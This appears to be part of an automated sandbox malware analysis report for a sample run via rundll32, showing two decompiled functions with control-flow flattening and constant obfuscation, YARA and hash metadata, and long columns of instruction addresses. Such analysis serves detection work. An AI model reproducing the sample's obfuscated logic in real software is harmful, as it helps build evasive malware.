                                                                                                                          0x007a9800
                                                                                                                          0x007a9808
                                                                                                                          0x007a9817
                                                                                                                          0x007a9818
                                                                                                                          0x007a9821
                                                                                                                          0x007a9825
                                                                                                                          0x007a982d
                                                                                                                          0x007a9835
                                                                                                                          0x007a983d
                                                                                                                          0x007a9845
                                                                                                                          0x007a984d
                                                                                                                          0x007a9860
                                                                                                                          0x007a9867
                                                                                                                          0x007a9872
                                                                                                                          0x007a987a
                                                                                                                          0x007a9883
                                                                                                                          0x007a9887
                                                                                                                          0x007a988c
                                                                                                                          0x007a9894
                                                                                                                          0x007a989c
                                                                                                                          0x007a98a0
                                                                                                                          0x007a98a8
                                                                                                                          0x007a98b5
                                                                                                                          0x007a98b9
                                                                                                                          0x007a98c1
                                                                                                                          0x007a98c9
                                                                                                                          0x007a98d1
                                                                                                                          0x007a98d9
                                                                                                                          0x007a98e1
                                                                                                                          0x007a98ef
                                                                                                                          0x007a98f3
                                                                                                                          0x007a98f8
                                                                                                                          0x007a9900
                                                                                                                          0x007a9908
                                                                                                                          0x007a990d
                                                                                                                          0x007a9915
                                                                                                                          0x007a991d
                                                                                                                          0x007a9927
                                                                                                                          0x007a992b
                                                                                                                          0x007a992f
                                                                                                                          0x007a9937
                                                                                                                          0x007a993f
                                                                                                                          0x007a9947
                                                                                                                          0x007a994f
                                                                                                                          0x007a9957
                                                                                                                          0x007a995f
                                                                                                                          0x007a9967
                                                                                                                          0x007a9974
                                                                                                                          0x007a9978
                                                                                                                          0x007a997d
                                                                                                                          0x007a9985
                                                                                                                          0x007a998d
                                                                                                                          0x007a9991
                                                                                                                          0x007a999e
                                                                                                                          0x007a99a2
                                                                                                                          0x007a99aa
                                                                                                                          0x007a99b2
                                                                                                                          0x007a99b7
                                                                                                                          0x007a99bc
                                                                                                                          0x007a99c4
                                                                                                                          0x007a99cc
                                                                                                                          0x007a99cc
                                                                                                                          0x007a99da
                                                                                                                          0x007a9afd
                                                                                                                          0x007a9b06
                                                                                                                          0x007a9b0d
                                                                                                                          0x007a9b0e
                                                                                                                          0x007a9b15
                                                                                                                          0x007a9b1c
                                                                                                                          0x007a9b23
                                                                                                                          0x007a9b32
                                                                                                                          0x007a9b3d
                                                                                                                          0x007a9b49
                                                                                                                          0x007a9b54
                                                                                                                          0x007a9b62
                                                                                                                          0x007a9b69
                                                                                                                          0x007a9b70
                                                                                                                          0x007a9b74
                                                                                                                          0x007a9b76
                                                                                                                          0x007a9b79
                                                                                                                          0x00000000
                                                                                                                          0x007a99e0
                                                                                                                          0x007a99e6
                                                                                                                          0x007a9a87
                                                                                                                          0x007a9a90
                                                                                                                          0x007a9a98
                                                                                                                          0x007a9a9e
                                                                                                                          0x007a9aac
                                                                                                                          0x007a9ac3
                                                                                                                          0x007a9ad6
                                                                                                                          0x007a9aeb
                                                                                                                          0x007a9af0
                                                                                                                          0x007a9af3
                                                                                                                          0x00000000
                                                                                                                          0x007a99ec
                                                                                                                          0x007a99f2
                                                                                                                          0x007a9bba
                                                                                                                          0x007a99f8
                                                                                                                          0x007a99fe
                                                                                                                          0x007a9a6d
                                                                                                                          0x007a9a72
                                                                                                                          0x007a9a74
                                                                                                                          0x007a9a77
                                                                                                                          0x007a9a7a
                                                                                                                          0x007a9a80
                                                                                                                          0x00000000
                                                                                                                          0x007a9a80
                                                                                                                          0x007a9a00
                                                                                                                          0x007a9a06
                                                                                                                          0x007a9a31
                                                                                                                          0x00000000
                                                                                                                          0x007a9a08
                                                                                                                          0x007a9a0e
                                                                                                                          0x00000000
                                                                                                                          0x007a9a14
                                                                                                                          0x007a9a24
                                                                                                                          0x007a9a2a
                                                                                                                          0x00000000
                                                                                                                          0x007a9a2a
                                                                                                                          0x007a9a0e
                                                                                                                          0x007a9a06
                                                                                                                          0x007a99fe
                                                                                                                          0x007a99f2
                                                                                                                          0x007a99e6
                                                                                                                          0x007a9bc5
                                                                                                                          0x007a9bce
                                                                                                                          0x007a9bce
                                                                                                                          0x007a9b88
                                                                                                                          0x007a9b8f
                                                                                                                          0x007a9b94
                                                                                                                          0x007a9b9b
                                                                                                                          0x007a9b9b
                                                                                                                          0x007a9b9b
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: HwP$QjTF$aH3
                                                                                                                          • API String ID: 0-3950587752
                                                                                                                          • Opcode ID: 9ff94984509cc06f9b05c4a98d9f8e9737fab423ff2acc2334446aa5e287f6f6
                                                                                                                          • Instruction ID: c37ea3ea792c045bbaa4f9dbbcedbb3b0e29edeac1413d1a63c9f6d11ccc9a37
                                                                                                                          • Opcode Fuzzy Hash: 9ff94984509cc06f9b05c4a98d9f8e9737fab423ff2acc2334446aa5e287f6f6
                                                                                                                          • Instruction Fuzzy Hash: 9EE13E714093819FD368CF25C58AA1BBBE1FBC5748F208A1DF29A86260D7B59949CF43
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0079B2C7 Relevance: 4.0, Strings: 3, Instructions: 235COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 95%
                                                                                                                          			E0079B2C7(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v40;
				char _v48;
				intOrPtr _v72;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v92;
				char _v108;
				char _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				void* _t137;
				intOrPtr* _t157;
				signed int _t166;
				void* _t173;
				intOrPtr _t191;
				void* _t203;
				void* _t208;
				signed int _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				intOrPtr* _t213;
				void* _t215;
				void* _t216;
				void* _t218;

				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007A20B9(_t137);
				_v136 = 0x2c5bc;
				_t216 = _t215 + 0xc;
				_t208 = 0;
				_t173 = 0xf62a13b;
				_t209 = 0x63;
				_v136 = _v136 / _t209;
				_v136 = _v136 + 0xe356;
				_v136 = _v136 ^ 0x000982ba;
				_v156 = 0x35028b;
				_v156 = _v156 | 0x143a760d;
				_v156 = _v156 + 0xfffff236;
				_v156 = _v156 ^ 0x8a3e1055;
				_v156 = _v156 ^ 0x9e033c32;
				_v128 = 0xf43d73;
				_v128 = _v128 | 0xd1983256;
				_v128 = _v128 ^ 0xd1f71de4;
				_v120 = 0x9951cf;
				_v120 = _v120 + 0xffffd11b;
				_v120 = _v120 ^ 0x00948e71;
				_v152 = 0x57fc5b;
				_v152 = _v152 | 0x88a856bb;
				_v152 = _v152 << 9;
				_v152 = _v152 + 0xa27f;
				_v152 = _v152 ^ 0xfff91174;
				_v116 = 0x3d6e6b;
				_t210 = 9;
				_v116 = _v116 / _t210;
				_v116 = _v116 ^ 0x0006b75d;
				_v140 = 0x916f20;
				_t211 = 0x35;
				_v140 = _v140 * 0x22;
				_v140 = _v140 / _t211;
				_t212 = 0x7b;
				_v140 = _v140 * 0x1d;
				_v140 = _v140 ^ 0x0a9423e2;
				_v148 = 0x96f30f;
				_v148 = _v148 ^ 0x6547be83;
				_v148 = _v148 << 9;
				_v148 = _v148 | 0xa101889a;
				_v148 = _v148 ^ 0xa391ec3d;
				_v124 = 0x9e8998;
				_v124 = _v124 | 0x73c531f9;
				_v124 = _v124 ^ 0x73d6e9c9;
				_v132 = 0xda1f74;
				_v132 = _v132 + 0x97a0;
				_v132 = _v132 ^ 0xdacfb227;
				_v132 = _v132 ^ 0xda161b2e;
				_v144 = 0x87027b;
				_t213 = _v128;
				_v144 = _v144 / _t212;
				_v144 = _v144 + 0x3568;
				_v144 = _v144 | 0x38a39b99;
				_v144 = _v144 ^ 0x38a88a96;
				while(1) {
					_t218 = _t173 - 0x628c872;
					if(_t218 > 0) {
						goto L25;
					}
					L2:
					if(_t218 == 0) {
						_push(_t173);
						_push(_t173);
						_t203 = 0x50;
						_t213 = E00797FF2(_t203);
						__eflags = _t213;
						if(__eflags == 0) {
							L16:
							_t173 = 0xe7b6043;
							continue;
							do {
								while(1) {
									_t218 = _t173 - 0x628c872;
									if(_t218 > 0) {
										goto L25;
									}
									goto L2;
								}
								goto L25;
								L45:
								__eflags = _t173 - 0xee0c843;
							} while (__eflags != 0);
							L46:
							return _t208;
						}
						_t173 = 0xf1dea2;
						 *((intOrPtr*)(_t213 + 0x24)) = _v92;
						 *((intOrPtr*)(_t213 + 0x3c)) = _v80;
						 *((intOrPtr*)(_t213 + 0x20)) = _v72;
						continue;
					}
					if(_t173 == 0xf1dea2) {
						__eflags = _v84 - 1;
						if(__eflags == 0) {
							E007A4B87( &_v108);
							L13:
							_t173 = 0x4d68783;
							continue;
						}
						_t173 = 0x9ca47b0;
						continue;
					}
					if(_t173 == 0x1c23c86) {
						__eflags = _v84 - 4;
						if(__eflags == 0) {
							E007A6DF8( &_v108);
							goto L13;
						}
						_t173 = 0x6a06f56;
						continue;
					}
					if(_t173 == 0x45d7e1c) {
						_t157 = E007AD97D( &_v40, _v120, __eflags, _v152,  &_v48, _v116);
						_t216 = _t216 + 0xc;
						__eflags = _t157;
						if(__eflags == 0) {
							goto L46;
						}
						goto L16;
					}
					if(_t173 == 0x483085d) {
						__eflags = _v84 - 7;
						if(__eflags == 0) {
							E007A0E53( &_v108);
						}
						goto L13;
					}
					if(_t173 == 0x4d68783) {
						_t191 =  *0x7b3208; // 0x0
						_t208 = _t208 + 1;
						 *_t213 =  *((intOrPtr*)(_t191 + 0x20c));
						 *((intOrPtr*)(_t191 + 0x20c)) = _t213;
						L10:
						_t173 = 0x45d7e1c;
						continue;
					}
					if(_t173 != 0x4fb7fc6) {
						goto L45;
					}
					E007A0B19(0);
					goto L10;
					L25:
					__eflags = _t173 - 0x6a06f56;
					if(_t173 == 0x6a06f56) {
						__eflags = _v84 - 5;
						if(__eflags == 0) {
							E0079B74D( &_v108, _t213);
							_t173 = 0x4d68783;
							goto L45;
						}
						_t173 = 0xcf2e7b4;
						continue;
					}
					__eflags = _t173 - 0x9a20357;
					if(_t173 == 0x9a20357) {
						__eflags = _v84 - 3;
						if(__eflags == 0) {
							E007A1889( &_v108);
							goto L13;
						}
						_t173 = 0x1c23c86;
						continue;
					}
					__eflags = _t173 - 0x9ca47b0;
					if(_t173 == 0x9ca47b0) {
						__eflags = _v84 - 2;
						if(__eflags == 0) {
							E00799714( &_v108, _t213);
							goto L13;
						}
						_t173 = 0x9a20357;
						continue;
					}
					__eflags = _t173 - 0xcf2e7b4;
					if(_t173 == 0xcf2e7b4) {
						__eflags = _v84 - 6;
						if(__eflags == 0) {
							E0079F09B( &_v108);
							goto L13;
						}
						_t173 = 0x483085d;
						continue;
					}
					__eflags = _t173 - 0xe7b6043;
					if(_t173 == 0xe7b6043) {
						_t166 = E0079E5CF( &_v48, _v140,  &_v112, _v148);
						asm("sbb ecx, ecx");
						_t173 = ( ~_t166 & 0x01cb4a56) + 0x45d7e1c;
						continue;
					}
					__eflags = _t173 - 0xf62a13b;
					if(_t173 != 0xf62a13b) {
						goto L45;
					}
					E00793DBC( &_v40, _a4, _v136, _v156, _v128);
					_t216 = _t216 + 0xc;
					_t173 = 0x4fb7fc6;
				}
			}





































                                                                                                                          0x0079b2d1
                                                                                                                          0x0079b2d8
                                                                                                                          0x0079b2d9
                                                                                                                          0x0079b2da
                                                                                                                          0x0079b2df
                                                                                                                          0x0079b2e7
                                                                                                                          0x0079b2f0
                                                                                                                          0x0079b2f2
                                                                                                                          0x0079b303
                                                                                                                          0x0079b308
                                                                                                                          0x0079b30e
                                                                                                                          0x0079b316
                                                                                                                          0x0079b31e
                                                                                                                          0x0079b326
                                                                                                                          0x0079b32e
                                                                                                                          0x0079b336
                                                                                                                          0x0079b33e
                                                                                                                          0x0079b346
                                                                                                                          0x0079b34e
                                                                                                                          0x0079b356
                                                                                                                          0x0079b35e
                                                                                                                          0x0079b366
                                                                                                                          0x0079b36e
                                                                                                                          0x0079b376
                                                                                                                          0x0079b37e
                                                                                                                          0x0079b386
                                                                                                                          0x0079b38b
                                                                                                                          0x0079b393
                                                                                                                          0x0079b39b
                                                                                                                          0x0079b3a7
                                                                                                                          0x0079b3ac
                                                                                                                          0x0079b3b2
                                                                                                                          0x0079b3ba
                                                                                                                          0x0079b3c7
                                                                                                                          0x0079b3ca
                                                                                                                          0x0079b3d6
                                                                                                                          0x0079b3df
                                                                                                                          0x0079b3e0
                                                                                                                          0x0079b3e4
                                                                                                                          0x0079b3ec
                                                                                                                          0x0079b3f4
                                                                                                                          0x0079b3fc
                                                                                                                          0x0079b401
                                                                                                                          0x0079b409
                                                                                                                          0x0079b411
                                                                                                                          0x0079b419
                                                                                                                          0x0079b421
                                                                                                                          0x0079b429
                                                                                                                          0x0079b431
                                                                                                                          0x0079b439
                                                                                                                          0x0079b441
                                                                                                                          0x0079b449
                                                                                                                          0x0079b457
                                                                                                                          0x0079b45b
                                                                                                                          0x0079b45f
                                                                                                                          0x0079b467
                                                                                                                          0x0079b46f
                                                                                                                          0x0079b477
                                                                                                                          0x0079b477
                                                                                                                          0x0079b47d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079b483
                                                                                                                          0x0079b483
                                                                                                                          0x0079b56e
                                                                                                                          0x0079b56f
                                                                                                                          0x0079b572
                                                                                                                          0x0079b578
                                                                                                                          0x0079b57c
                                                                                                                          0x0079b57e
                                                                                                                          0x0079b520
                                                                                                                          0x0079b520
                                                                                                                          0x0079b525
                                                                                                                          0x0079b477
                                                                                                                          0x0079b477
                                                                                                                          0x0079b477
                                                                                                                          0x0079b47d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079b47d
                                                                                                                          0x00000000
                                                                                                                          0x0079b6b6
                                                                                                                          0x0079b6b6
                                                                                                                          0x0079b6b6
                                                                                                                          0x0079b6c2
                                                                                                                          0x0079b6ce
                                                                                                                          0x0079b6ce
                                                                                                                          0x0079b584
                                                                                                                          0x0079b589
                                                                                                                          0x0079b590
                                                                                                                          0x0079b597
                                                                                                                          0x00000000
                                                                                                                          0x0079b597
                                                                                                                          0x0079b48f
                                                                                                                          0x0079b546
                                                                                                                          0x0079b54b
                                                                                                                          0x0079b55b
                                                                                                                          0x0079b4e6
                                                                                                                          0x0079b4e6
                                                                                                                          0x00000000
                                                                                                                          0x0079b4e6
                                                                                                                          0x0079b54d
                                                                                                                          0x00000000
                                                                                                                          0x0079b54d
                                                                                                                          0x0079b49b
                                                                                                                          0x0079b52a
                                                                                                                          0x0079b52f
                                                                                                                          0x0079b53f
                                                                                                                          0x00000000
                                                                                                                          0x0079b53f
                                                                                                                          0x0079b531
                                                                                                                          0x00000000
                                                                                                                          0x0079b531
                                                                                                                          0x0079b4a3
                                                                                                                          0x0079b510
                                                                                                                          0x0079b515
                                                                                                                          0x0079b518
                                                                                                                          0x0079b51a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079b51a
                                                                                                                          0x0079b4ab
                                                                                                                          0x0079b4df
                                                                                                                          0x0079b4e4
                                                                                                                          0x0079b4ee
                                                                                                                          0x0079b4ee
                                                                                                                          0x00000000
                                                                                                                          0x0079b4e4
                                                                                                                          0x0079b4af
                                                                                                                          0x0079b4c8
                                                                                                                          0x0079b4ce
                                                                                                                          0x0079b4d5
                                                                                                                          0x0079b4d7
                                                                                                                          0x0079b4c4
                                                                                                                          0x0079b4c4
                                                                                                                          0x00000000
                                                                                                                          0x0079b4c4
                                                                                                                          0x0079b4b7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079b4bf
                                                                                                                          0x00000000
                                                                                                                          0x0079b59f
                                                                                                                          0x0079b59f
                                                                                                                          0x0079b5a5
                                                                                                                          0x0079b698
                                                                                                                          0x0079b69d
                                                                                                                          0x0079b6af
                                                                                                                          0x0079b6b4
                                                                                                                          0x00000000
                                                                                                                          0x0079b6b4
                                                                                                                          0x0079b69f
                                                                                                                          0x00000000
                                                                                                                          0x0079b69f
                                                                                                                          0x0079b5ab
                                                                                                                          0x0079b5b1
                                                                                                                          0x0079b679
                                                                                                                          0x0079b67e
                                                                                                                          0x0079b68e
                                                                                                                          0x00000000
                                                                                                                          0x0079b68e
                                                                                                                          0x0079b680
                                                                                                                          0x00000000
                                                                                                                          0x0079b680
                                                                                                                          0x0079b5b7
                                                                                                                          0x0079b5bd
                                                                                                                          0x0079b658
                                                                                                                          0x0079b65d
                                                                                                                          0x0079b66f
                                                                                                                          0x00000000
                                                                                                                          0x0079b66f
                                                                                                                          0x0079b65f
                                                                                                                          0x00000000
                                                                                                                          0x0079b65f
                                                                                                                          0x0079b5c3
                                                                                                                          0x0079b5c9
                                                                                                                          0x0079b639
                                                                                                                          0x0079b63e
                                                                                                                          0x0079b64e
                                                                                                                          0x00000000
                                                                                                                          0x0079b64e
                                                                                                                          0x0079b640
                                                                                                                          0x00000000
                                                                                                                          0x0079b640
                                                                                                                          0x0079b5cb
                                                                                                                          0x0079b5d1
                                                                                                                          0x0079b61f
                                                                                                                          0x0079b62a
                                                                                                                          0x0079b632
                                                                                                                          0x00000000
                                                                                                                          0x0079b632
                                                                                                                          0x0079b5d3
                                                                                                                          0x0079b5d9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079b5f9
                                                                                                                          0x0079b5fe
                                                                                                                          0x0079b601
                                                                                                                          0x0079b601

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: V$h5$kn=
                                                                                                                          • API String ID: 0-2568719763
                                                                                                                          • Opcode ID: 4b31a38b0853a938c98b78d50f46f2734b4728c91684112341591dc202904d3b
                                                                                                                          • Instruction ID: 36d7ea999c54e8ffd9f5387457573c006380d87d29ca9a4531cbe5ff780dd779
                                                                                                                          • Opcode Fuzzy Hash: 4b31a38b0853a938c98b78d50f46f2734b4728c91684112341591dc202904d3b
                                                                                                                          • Instruction Fuzzy Hash: E8A17771108380CBCB28DF65F69952BBBE1FBC5308F144A2EF19696261D7399A09DF43
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007A4116 Relevance: 4.0, Strings: 3, Instructions: 223COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 97%
                                                                                                                          			E007A4116() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _t220;
				signed int _t222;
				void* _t224;
				void* _t226;
				void* _t227;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t250;
				void* _t253;
				void* _t258;
				void* _t260;

				_v604 = 0x9b146b;
				_v604 = _v604 | 0x658b3ccc;
				_v604 = _v604 + 0xfffff1f3;
				_v604 = _v604 ^ 0x659b2e62;
				_v596 = 0xb07d39;
				_v596 = _v596 | 0x89b98cff;
				_v596 = _v596 ^ 0x89b9fdfe;
				_v584 = 0x342693;
				_v584 = _v584 ^ 0x5537c6ac;
				_v584 = _v584 ^ 0x5503e03c;
				_v628 = 0x844a73;
				_v628 = _v628 | 0x8aea995b;
				_v628 = _v628 >> 3;
				_v628 = _v628 ^ 0x3316179a;
				_v628 = _v628 ^ 0x224eeca0;
				_v644 = 0xac1c02;
				_v644 = _v644 * 0x6d;
				_t227 = 0;
				_v644 = _v644 << 0xf;
				_t253 = 0x9728f62;
				_t229 = 0x52;
				_v644 = _v644 * 0x23;
				_v644 = _v644 ^ 0xb0e78180;
				_v636 = 0x949b2b;
				_v636 = _v636 / _t229;
				_v636 = _v636 << 4;
				_t230 = 0x48;
				_v636 = _v636 / _t230;
				_v636 = _v636 ^ 0x000805f9;
				_v652 = 0x50f951;
				_v652 = _v652 << 0xe;
				_v652 = _v652 + 0xffff7357;
				_v652 = _v652 >> 5;
				_v652 = _v652 ^ 0x01f330c3;
				_v624 = 0xa7ee55;
				_v624 = _v624 + 0x328f;
				_t231 = 0x36;
				_v624 = _v624 / _t231;
				_v624 = _v624 + 0x3260;
				_v624 = _v624 ^ 0x000caec1;
				_v632 = 0x45b476;
				_v632 = _v632 << 0xf;
				_v632 = _v632 + 0x3fe9;
				_v632 = _v632 + 0xffffc242;
				_v632 = _v632 ^ 0xda30ae70;
				_v576 = 0xb3f46f;
				_v576 = _v576 >> 0xe;
				_v576 = _v576 ^ 0x000becca;
				_v640 = 0x899e10;
				_v640 = _v640 << 3;
				_v640 = _v640 | 0x15c6522a;
				_v640 = _v640 >> 0xc;
				_v640 = _v640 ^ 0x00018fe0;
				_v648 = 0x6b2405;
				_v648 = _v648 | 0xec8a856c;
				_v648 = _v648 + 0xffffe7b2;
				_v648 = _v648 >> 0xd;
				_v648 = _v648 ^ 0x000a0717;
				_v608 = 0xd62f5d;
				_v608 = _v608 + 0xffffa804;
				_v608 = _v608 >> 1;
				_v608 = _v608 ^ 0x00686b18;
				_v580 = 0x2fce72;
				_t232 = 6;
				_v580 = _v580 / _t232;
				_v580 = _v580 ^ 0x000627ef;
				_v612 = 0xa7d19a;
				_v612 = _v612 ^ 0x125f9685;
				_v612 = _v612 ^ 0x35fdcbd7;
				_v612 = _v612 ^ 0x270c67d8;
				_v656 = 0x784491;
				_v656 = _v656 >> 9;
				_v656 = _v656 | 0xfbff7fff;
				_v656 = _v656 ^ 0xfbf9abc9;
				_v616 = 0xc21bdd;
				_t233 = 0x58;
				_v616 = _v616 / _t233;
				_v616 = _v616 | 0xde7eb344;
				_v616 = _v616 ^ 0xde714edb;
				_v620 = 0x22ba29;
				_v620 = _v620 + 0xc334;
				_v620 = _v620 ^ 0x41b5236d;
				_v620 = _v620 ^ 0x4193ad78;
				_v588 = 0x61092c;
				_v588 = _v588 | 0xfbe761ce;
				_v588 = _v588 ^ 0xfbe7142a;
				_v600 = 0xd9609d;
				_v600 = _v600 | 0x95d54fcb;
				_v600 = _v600 ^ 0x95d705b7;
				_v592 = 0xc80f6b;
				_t234 = 0x42;
				_t252 = _v600;
				_v592 = _v592 / _t234;
				_v592 = _v592 ^ 0x0000156e;
				do {
					while(_t253 != 0x25f6a69) {
						if(_t253 == 0x9728f62) {
							_t253 = 0xea70970;
							continue;
						} else {
							if(_t253 == 0x9c0fe90) {
								_t250 = _v632;
								_t220 = E00798F65(_v624, _t250,  &_v524, _v576, _t227, _v624, _v604, _v640, _v584, _v648, _v624, _v596);
								_t252 = _t220;
								_t260 = _t260 + 0x28;
								__eflags = _t220 - 0xffffffff;
								if(__eflags != 0) {
									_t253 = 0xaccbeb9;
									continue;
								}
							} else {
								if(_t253 == 0xaccbeb9) {
									_t222 = E00799350( &_v564, _t252, _v608, _v580, _t234, _v612);
									asm("sbb esi, esi");
									_t250 = _v616;
									_t253 = ( ~_t222 & 0x010509a4) + 0x15a60c5;
									_t234 = _v656;
									E007A1E67(_v656, _t250, _v620, _v588, _t252);
									_t260 = _t260 + 0x20;
									goto L14;
								} else {
									if(_t253 == 0xdba0984) {
										_t224 = E007AABD1();
										_t258 = _v572 - _v548;
										asm("sbb ecx, [esp+0x84]");
										__eflags = _v568 - _t250;
										if(__eflags >= 0) {
											if(__eflags > 0) {
												L19:
												_t227 = 1;
												__eflags = 1;
											} else {
												__eflags = _t258 - _t224;
												if(_t258 >= _t224) {
													goto L19;
												}
											}
										}
									} else {
										_t268 = _t253 - 0xea70970;
										if(_t253 != 0xea70970) {
											goto L14;
										} else {
											_t250 = _v644;
											_t234 = _v628;
											_t226 = E007ADA22(_v628, _t250, _t268, _v636,  &_v524, _v628, _v652);
											_t260 = _t260 + 0x10;
											if(_t226 != 0) {
												_t253 = 0x9c0fe90;
												continue;
											}
										}
									}
								}
							}
						}
						L20:
						return _t227;
					}
					E007AC1EC(_v600, _v592,  &_v572);
					_pop(_t234);
					_t253 = 0xdba0984;
					L14:
					__eflags = _t253 - 0x15a60c5;
				} while (__eflags != 0);
				goto L20;
			}











































                                                                                                                          0x007a411c
                                                                                                                          0x007a4126
                                                                                                                          0x007a412e
                                                                                                                          0x007a4136
                                                                                                                          0x007a413e
                                                                                                                          0x007a4146
                                                                                                                          0x007a414e
                                                                                                                          0x007a4156
                                                                                                                          0x007a415e
                                                                                                                          0x007a4166
                                                                                                                          0x007a416e
                                                                                                                          0x007a4176
                                                                                                                          0x007a417e
                                                                                                                          0x007a4183
                                                                                                                          0x007a418b
                                                                                                                          0x007a4193
                                                                                                                          0x007a41a4
                                                                                                                          0x007a41a8
                                                                                                                          0x007a41aa
                                                                                                                          0x007a41af
                                                                                                                          0x007a41bb
                                                                                                                          0x007a41be
                                                                                                                          0x007a41c2
                                                                                                                          0x007a41ca
                                                                                                                          0x007a41da
                                                                                                                          0x007a41de
                                                                                                                          0x007a41e7
                                                                                                                          0x007a41ec
                                                                                                                          0x007a41f2
                                                                                                                          0x007a41fa
                                                                                                                          0x007a4202
                                                                                                                          0x007a4207
                                                                                                                          0x007a420f
                                                                                                                          0x007a4214
                                                                                                                          0x007a421c
                                                                                                                          0x007a4224
                                                                                                                          0x007a4230
                                                                                                                          0x007a4233
                                                                                                                          0x007a4237
                                                                                                                          0x007a423f
                                                                                                                          0x007a4247
                                                                                                                          0x007a424f
                                                                                                                          0x007a4254
                                                                                                                          0x007a425c
                                                                                                                          0x007a4264
                                                                                                                          0x007a426c
                                                                                                                          0x007a4274
                                                                                                                          0x007a4279
                                                                                                                          0x007a4281
                                                                                                                          0x007a4289
                                                                                                                          0x007a428e
                                                                                                                          0x007a4296
                                                                                                                          0x007a429b
                                                                                                                          0x007a42a3
                                                                                                                          0x007a42ab
                                                                                                                          0x007a42b3
                                                                                                                          0x007a42bb
                                                                                                                          0x007a42c0
                                                                                                                          0x007a42c8
                                                                                                                          0x007a42d0
                                                                                                                          0x007a42d8
                                                                                                                          0x007a42dc
                                                                                                                          0x007a42e4
                                                                                                                          0x007a42f4
                                                                                                                          0x007a42f9
                                                                                                                          0x007a42ff
                                                                                                                          0x007a430c
                                                                                                                          0x007a4314
                                                                                                                          0x007a431c
                                                                                                                          0x007a4324
                                                                                                                          0x007a432c
                                                                                                                          0x007a4334
                                                                                                                          0x007a4339
                                                                                                                          0x007a4341
                                                                                                                          0x007a4349
                                                                                                                          0x007a4355
                                                                                                                          0x007a435a
                                                                                                                          0x007a4360
                                                                                                                          0x007a4368
                                                                                                                          0x007a4370
                                                                                                                          0x007a4378
                                                                                                                          0x007a4380
                                                                                                                          0x007a4388
                                                                                                                          0x007a4390
                                                                                                                          0x007a4398
                                                                                                                          0x007a43a0
                                                                                                                          0x007a43a8
                                                                                                                          0x007a43b0
                                                                                                                          0x007a43b8
                                                                                                                          0x007a43c0
                                                                                                                          0x007a43cc
                                                                                                                          0x007a43cf
                                                                                                                          0x007a43d3
                                                                                                                          0x007a43d7
                                                                                                                          0x007a43df
                                                                                                                          0x007a43df
                                                                                                                          0x007a43f1
                                                                                                                          0x007a44da
                                                                                                                          0x00000000
                                                                                                                          0x007a43f7
                                                                                                                          0x007a43f9
                                                                                                                          0x007a44b8
                                                                                                                          0x007a44c1
                                                                                                                          0x007a44c6
                                                                                                                          0x007a44c8
                                                                                                                          0x007a44cb
                                                                                                                          0x007a44ce
                                                                                                                          0x007a44d0
                                                                                                                          0x00000000
                                                                                                                          0x007a44d0
                                                                                                                          0x007a43ff
                                                                                                                          0x007a4405
                                                                                                                          0x007a445e
                                                                                                                          0x007a446a
                                                                                                                          0x007a447b
                                                                                                                          0x007a447f
                                                                                                                          0x007a4485
                                                                                                                          0x007a4489
                                                                                                                          0x007a448e
                                                                                                                          0x00000000
                                                                                                                          0x007a4407
                                                                                                                          0x007a440d
                                                                                                                          0x007a450a
                                                                                                                          0x007a4513
                                                                                                                          0x007a451e
                                                                                                                          0x007a4525
                                                                                                                          0x007a4527
                                                                                                                          0x007a4529
                                                                                                                          0x007a452f
                                                                                                                          0x007a4531
                                                                                                                          0x007a4531
                                                                                                                          0x007a452b
                                                                                                                          0x007a452b
                                                                                                                          0x007a452d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a452d
                                                                                                                          0x007a4529
